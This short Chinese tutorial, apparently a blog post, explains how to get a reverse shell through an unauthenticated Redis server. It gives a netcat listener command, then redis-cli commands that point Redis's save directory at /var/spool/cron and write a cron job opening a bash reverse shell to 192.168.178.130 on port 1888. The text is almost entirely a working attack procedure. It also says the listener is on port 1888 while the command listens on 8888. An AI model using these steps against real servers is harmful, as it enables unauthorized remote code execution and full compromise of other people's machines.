redis未授权访问get-shell (二)（反弹shell）

一、

在攻击者服务器上监听一个端口1888（注意该端口是开放的）：

nc -lvp 8888

二、

连接redis，写入反弹shell

redis-cli -h xxx.xxx.xxx.xxx

在这里插入图片描述config set dir /var/spool/cron

config set dbfilename root

set xxx “\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.178.130/1888 0>&1\n\n”

save